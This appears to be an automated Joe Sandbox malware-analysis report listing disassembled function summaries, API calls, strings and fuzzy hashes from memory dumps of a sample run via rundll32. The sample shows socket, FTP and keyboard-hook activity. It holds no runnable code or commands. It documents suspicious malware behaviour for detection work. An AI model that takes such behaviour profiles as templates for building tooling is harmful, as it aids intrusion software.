                    • API String ID: 1447571555-2271619998
                    • Opcode ID: 4c93990ba21179558756ae70268926dbe39c2229d90372b49aaf60ce341ed50b
                    • Instruction ID: b918e6bf72bc1ccbebcf53a82cf9ebb0ba28ae16cdd94e69e0864b87216a98d7
                    • Opcode Fuzzy Hash: 4c93990ba21179558756ae70268926dbe39c2229d90372b49aaf60ce341ed50b
                    • Instruction Fuzzy Hash: C94149B1A00626EBDB10CF65C984A6EB7B8FF44709F15906DDD56A7241EB34FD02CBA0
                    APIs
                    • GetLastError.KERNEL32(?,00000000,?,6D008B2F,00000000,?,00000100,?,?,?,?,?,?,?), ref: 6D01A853
                    • _strncpy.LIBCMT ref: 6D01A89A
                    • _strrchr.LIBCMT ref: 6D01A8DA
                    • _strrchr.LIBCMT ref: 6D01A8F5
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D01A921
                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D01A92C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$_strrchr$_strncpy
                    • String ID: Unknown error %d (%#x)
                    • API String ID: 1320708361-2414550090
                    • Opcode ID: 8211643c6de02276226b1022e9e141c2e5f0595db5095ec0453ff37411a498f4
                    • Instruction ID: 848aefadd7df38824b60176e3636813859dac731c0d8aab6f4892f6214e990b4
                    • Opcode Fuzzy Hash: 8211643c6de02276226b1022e9e141c2e5f0595db5095ec0453ff37411a498f4
                    • Instruction Fuzzy Hash: 9A21E26160C2056EF7015BF4AC84F3F7BECDF5225DF220069FD0197292EB25984A87B2
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC37EC
                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 04EC3807
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC3811
                    • FreeLibrary.KERNEL32(00000000), ref: 04EC3825
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryProc$FreeLoad
                    • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                    • API String ID: 2256533930-2522683910
                    • Opcode ID: d04a780193e66664df2c201d6dc533425395594fdcb569cecf99055098fb8f48
                    • Instruction ID: 0ad00dc6770eafd2e597779cf05bb48106841a701fa63befd2e4f723d49a206b
                    • Opcode Fuzzy Hash: d04a780193e66664df2c201d6dc533425395594fdcb569cecf99055098fb8f48
                    • Instruction Fuzzy Hash: C4F0EC7650131CBFD71097A5ED46EAFB76CDF45B51B100159FC04932009B75BD0246F4
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5A10
                    • __alloca_probe_16.LIBCMT ref: 6CFF5A3C
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5A7B
                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5A98
                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5AD7
                    • __alloca_probe_16.LIBCMT ref: 6CFF5AF4
                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5B36
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,6D085074,00000000,?,bad locale name), ref: 6CFF5B59
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                    • String ID:
                    • API String ID: 2040435927-0
                    • Opcode ID: bf8a21600ff9ec3e323f8656af19202ed70936da623c109980ef04cd4df5fc5e
                    • Instruction ID: 0e867ce08b6c586ae5a61aea1fe62d530fc8f66ad2d04595cb721ee74c18030d
                    • Opcode Fuzzy Hash: bf8a21600ff9ec3e323f8656af19202ed70936da623c109980ef04cd4df5fc5e
                    • Instruction Fuzzy Hash: 7F517E7260121AABEF108F65CC44FAF7BB9EF45758F218125FE24A75A4D731C912CB60
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,762323A0,?,04EC4875), ref: 04EC73E2
                    • CloseHandle.KERNEL32(?), ref: 04EC73EF
                    • CloseHandle.KERNEL32(?,762323A0,?,04EC4875), ref: 04EC73F8
                    • DeleteCriticalSection.KERNEL32(?), ref: 04EC7401
                    • WSACleanup.WS2_32 ref: 04EC7407
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04EC7429
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04EC7441
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04EC7459
                      • Part of subcall function 04EC7200: setsockopt.WS2_32(?,0000FFFF,00000080,04ECCA88,00000004), ref: 04EC7222
                      • Part of subcall function 04EC7200: CancelIo.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC722F
                      • Part of subcall function 04EC7200: InterlockedExchange.KERNEL32(?,00000000), ref: 04EC723E
                      • Part of subcall function 04EC7200: closesocket.WS2_32(?), ref: 04EC724B
                      • Part of subcall function 04EC7200: SetEvent.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC7258
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: FreeVirtual$CloseHandle$CancelCleanupCriticalDeleteEventExchangeInterlockedObjectSectionSingleWaitclosesocketsetsockopt
                    • String ID:
                    • API String ID: 1236122821-0
                    • Opcode ID: 76d4479af7893c0f68068143243440f509421e8f6f5785da5fab550584c4953a
                    • Instruction ID: f6e2a0d2f8ef3987651dd58522489964cdeb98ff0688402dec532fda0f8ed3d8
                    • Opcode Fuzzy Hash: 76d4479af7893c0f68068143243440f509421e8f6f5785da5fab550584c4953a
                    • Instruction Fuzzy Hash: 1211A070600B029BD230AB36ED09B47B3E8AF44711F105A1CA9A1A32D0CB74F806CF61
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: a9ea7d503aef376854bfeb198136d6e2439b39079f2ffa017acdb92599557e1b
                    • Instruction ID: 02020b934feb0d7d98ad413528ebe9e064ca0d1cd3601957393447d9a9b139c5
                    • Opcode Fuzzy Hash: a9ea7d503aef376854bfeb198136d6e2439b39079f2ffa017acdb92599557e1b
                    • Instruction Fuzzy Hash: F2B12472904256DFFB028F64CE91BEE7FA9EF46314F158165EE04AF281E3789911C7A0
                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 6D04CE10
                    • ___TypeMatch.LIBVCRUNTIME ref: 6D04CF1E
                    • CallUnexpected.LIBVCRUNTIME ref: 6D04D08B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CallMatchTypeUnexpectedtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 1206542248-393685449
                    • Opcode ID: c3b6bf9cca779ebda40b9f96ab3f2473ebf25a461350b18d696fb6235b179180
                    • Instruction ID: 012c3f52a26fd551dcd75580220761b0e1d36b36b9be6312ffce7783b3fc2451
                    • Opcode Fuzzy Hash: c3b6bf9cca779ebda40b9f96ab3f2473ebf25a461350b18d696fb6235b179180
                    • Instruction Fuzzy Hash: 81B19A7180420AEFEF05CFA5C880FAEBBB5BF49314B11816AE9106B211D735DA56CBA5
                    APIs
                    Strings
                    • Uploading to a URL without a file name, xrefs: 6D0265DF
                    • path contains control characters, xrefs: 6D0264D3
                    • Request has same path as previous transfer, xrefs: 6D026787
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy_strrchr
                    • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                    • API String ID: 3975226627-4131979473
                    • Opcode ID: 76cde709543ee9de113eaf3b59ae39718f96b2cde71774fbacb77738b89378a4
                    • Instruction ID: f75d90349d001c2e5a87946b28ec65e0731ba746a262bfc31beacd0ba2431927
                    • Opcode Fuzzy Hash: 76cde709543ee9de113eaf3b59ae39718f96b2cde71774fbacb77738b89378a4
                    • Instruction Fuzzy Hash: 7491F5746093438FFB118F24A848BBB7BE5AF81308F94043CE9599B242E772E519C7D5
                    APIs
                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D026B22
                      • Part of subcall function 6D0432A0: WSAGetLastError.WS2_32 ref: 6D043361
                    Strings
                    • We got a 421 - timeout, xrefs: 6D026AC0
                    • FTP response timeout, xrefs: 6D026B63
                    • FTP response aborted due to select/poll error: %d, xrefs: 6D026B29
                    • QUOT string not accepted: %s, xrefs: 6D026B48
                    • *, xrefs: 6D026AE5
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout
                    • API String ID: 1452528299-64802194
                    • Opcode ID: 7c013df3153b9e872788b6545c4712ef1fa23729c2f3e6ac2b25c4c62e407bde
                    • Instruction ID: e8fccd960d21d354169c7f8f074ae6c90a691820b22e19c18f8d0a506c7c8b43
                    • Opcode Fuzzy Hash: 7c013df3153b9e872788b6545c4712ef1fa23729c2f3e6ac2b25c4c62e407bde
                    • Instruction Fuzzy Hash: 0751F5759093025FF7018B18DC40BBBB7E8EF86318F848569FE6887251EB35D6098BD2
                    APIs
                    • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001), ref: 6CFFF6FD
                      • Part of subcall function 6D01BDE0: socket.WS2_32 ref: 6D01BE0A
                      • Part of subcall function 6D01BDE0: htonl.WS2_32(7F000001), ref: 6D01BE2F
                      • Part of subcall function 6D01BDE0: setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000006,00000004), ref: 6D01BE64
                      • Part of subcall function 6D01BDE0: bind.WS2_32(00000000,?,00000010), ref: 6D01BE7B
                      • Part of subcall function 6D01BDE0: getsockname.WS2_32(00000000,?,00000002), ref: 6D01BE95
                      • Part of subcall function 6D01BDE0: listen.WS2_32(00000000,00000001), ref: 6D01BEB2
                      • Part of subcall function 6D01BDE0: socket.WS2_32(00000002,00000001,00000000), ref: 6D01BEC7
                      • Part of subcall function 6D01BDE0: connect.WS2_32(00000000,?,00000010), ref: 6D01BEDC
                      • Part of subcall function 6D01BDE0: accept.WS2_32(00000000,00000000,00000000), ref: 6D01BF25
                      • Part of subcall function 6D01C660: WaitForSingleObjectEx.KERNEL32(6CFFF4D0,000000FF,00000000,?,0000000F,6CFFF4D0,?), ref: 6D01C66C
                      • Part of subcall function 6D01C660: CloseHandle.KERNEL32(6CFFF4D0), ref: 6D01C678
                    • closesocket.WS2_32(?), ref: 6CFFF739
                    • DeleteCriticalSection.KERNEL32(?), ref: 6CFFF749
                    • closesocket.WS2_32(?), ref: 6CFFF77F
                    • EnterCriticalSection.KERNEL32(?), ref: 6CFFF837
                    • LeaveCriticalSection.KERNEL32(?), ref: 6CFFF84A
                    • closesocket.WS2_32(?), ref: 6CFFF89C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$closesocket$socket$CloseDeleteEnterHandleInitializeLeaveObjectSingleWaitacceptbindconnectgetsocknamehtonllistensetsockopt
                    • String ID:
                    • API String ID: 3309228083-0
                    • Opcode ID: afe1b3450f34aec3678021db36c8bdc933ca15e8d5249a6f279320d9add8722f
                    • Instruction ID: eab26646cc42f87f9e5a8bf814014c4651271e896cadfb818e271b5cbc084091
                    • Opcode Fuzzy Hash: afe1b3450f34aec3678021db36c8bdc933ca15e8d5249a6f279320d9add8722f
                    • Instruction Fuzzy Hash: FB6116B1405306AFEB019F65DC4474ABBB4FF06319F144238F928AB691D771E065CFA1
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF1953
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CFF199F
                    • __Getctype.LIBCPMT ref: 6CFF19B8
                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CFF19D4
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF1A69
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                    • String ID: bad locale name
                    • API String ID: 1840309910-1405518554
                    • Opcode ID: a0507934d40f3f2b9c38c4ef023dac1684c477aa1c1994c77046206eb82f3217
                    • Instruction ID: f886d380f4c7a2f0c0d75448b67fb3e4be078b06c34fb89b3d19b2d7bd1e5366
                    • Opcode Fuzzy Hash: a0507934d40f3f2b9c38c4ef023dac1684c477aa1c1994c77046206eb82f3217
                    • Instruction Fuzzy Hash: 85515EF1D053489BEF00CFA4D844B9EBBB8EF14318F148129D924AB791E775E519CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                    • API String ID: 0-3982560815
                    • Opcode ID: e69b8f91076b8199cc9f8b0aa0448e675aa82e8b43c1d3fe8dae40eea2d628c7
                    • Instruction ID: 376c17157d0276ea1f76b679e56610e0eac4af298cdc6aae020558afd54fa68d
                    • Opcode Fuzzy Hash: e69b8f91076b8199cc9f8b0aa0448e675aa82e8b43c1d3fe8dae40eea2d628c7
                    • Instruction Fuzzy Hash: 194136B6F062016FF7118A68AC40BBB73E9DBC5265F150439F649CB242E721EC0986A6
                    APIs
                    • __EH_prolog3.LIBCMT ref: 6CFF52D0
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF52DB
                    • std::locale::_Setgloballocale.LIBCPMT ref: 6CFF52F6
                    • _Yarn.LIBCPMT ref: 6CFF530C
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D070F48,00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000,00000000), ref: 6CFF5318
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,00000004,6CFF469D,00000001,76230BD0,000000FF,?,6CFF3941,76230BD4,00000002,93BD9D6B,00000000), ref: 6CFF533C
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF5349
                      • Part of subcall function 6CFF542C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CFF5444
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisableLockitPrintScreen@@std::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                    • String ID:
                    • API String ID: 4086063808-0
                    • Opcode ID: a6e326fca0a63e80a57da541ef881fe42537718a81f73c5fb547fed343142d13
                    • Instruction ID: 3b55e7b81d616e940d1b8c379093f2a8cfd95688f6f0ce73b9590b43315c1ad4
                    • Opcode Fuzzy Hash: a6e326fca0a63e80a57da541ef881fe42537718a81f73c5fb547fed343142d13
                    • Instruction Fuzzy Hash: 46014279A042249BDB06CF20D890BBC3B71FF86214B24800CE8225BBC0CF746A03CBC6
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,93BD9D6B,?,?,00000000,6D06F243,000000FF,?,6D05C6F4,6D05C80B,?,6D05C6C8,00000000), ref: 6D05C78F
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D05C7A1
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D05C80B,?,?,00000000,6D06F243,000000FF,?,6D05C6F4,6D05C80B,?,6D05C6C8,00000000), ref: 6D05C7B2
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,6D06F243,000000FF,?,6D05C6F4,6D05C80B,?,6D05C6C8,00000000), ref: 6D05C7C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressDisableFreeHandleLibraryModulePrintProcScreen@@
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 2679947756-1276376045
                    • Opcode ID: 96e33d62a34c94c4d255624059b3e428c7125f5b2fc7a049ac4bb1966e627db1
                    • Instruction ID: f09e3258f1a795d404af672c36304c3a078f9fced63cc63133ced4f017a665a0
                    • Opcode Fuzzy Hash: 96e33d62a34c94c4d255624059b3e428c7125f5b2fc7a049ac4bb1966e627db1
                    • Instruction Fuzzy Hash: 6701A73290456AABEF019F51CC05FBE7BF8FB45715F000225FC22A26D0D7759900CA94
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,04ECC578,00000008,04EB4813,00000000,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C), ref: 04EB471C
                    • __lock.LIBCMT ref: 04EB4750
                      • Part of subcall function 04EBB0B8: __mtinitlocknum.LIBCMT ref: 04EBB0CE
                      • Part of subcall function 04EBB0B8: __amsg_exit.LIBCMT ref: 04EBB0DA
                      • Part of subcall function 04EBB0B8: EnterCriticalSection.KERNEL32(00000000,00000000,?,04EB48E3,0000000D,04ECC5A0,00000008,04EB49DA,00000000,?,04EB3E44,00000000,04ECC518,00000008,04EB3EA9,?), ref: 04EBB0E2
                    • InterlockedIncrement.KERNEL32(?), ref: 04EB475D
                    • __lock.LIBCMT ref: 04EB4771
                    • ___addlocaleref.LIBCMT ref: 04EB478F
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: KERNEL32.DLL
                    • API String ID: 637971194-2576044830
                    • Opcode ID: 79cd2d9d4f1f6f5b662483fa205ac2b7d01721fd42f639c5055d2bf93a206cec
                    • Instruction ID: 1c924f3077a5a6be8de69c2f5d72606407d6169564635760d80aec37f0f369fd
                    • Opcode Fuzzy Hash: 79cd2d9d4f1f6f5b662483fa205ac2b7d01721fd42f639c5055d2bf93a206cec
                    • Instruction Fuzzy Hash: 33015E71440B00DFE721EF69D50978ABBE0BF40319F10990DD8D557690CBB4B545CF91
                    APIs
                    • __getptd.LIBCMT ref: 04EC258E
                      • Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
                      • Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848
                    • __getptd.LIBCMT ref: 04EC259F
                    • __getptd.LIBCMT ref: 04EC25AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$RCC$csm
                    • API String ID: 803148776-2671469338
                    • Opcode ID: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
                    • Instruction ID: 3e10055c28c91c9e716f069f94fd740696b5e073c85e794c7fad5dc6d550c6f6
                    • Opcode Fuzzy Hash: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
                    • Instruction Fuzzy Hash: 3BE012749041448EDB20AB68D2597EE36D4EB8821CF5630E5E58CC7262C775F8918583
                    APIs
                    • __getptd.LIBCMT ref: 04EE1996
                      • Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
                      • Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0
                    • __getptd.LIBCMT ref: 04EE19A7
                    • __getptd.LIBCMT ref: 04EE19B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$RCC$csm
                    • API String ID: 803148776-2671469338
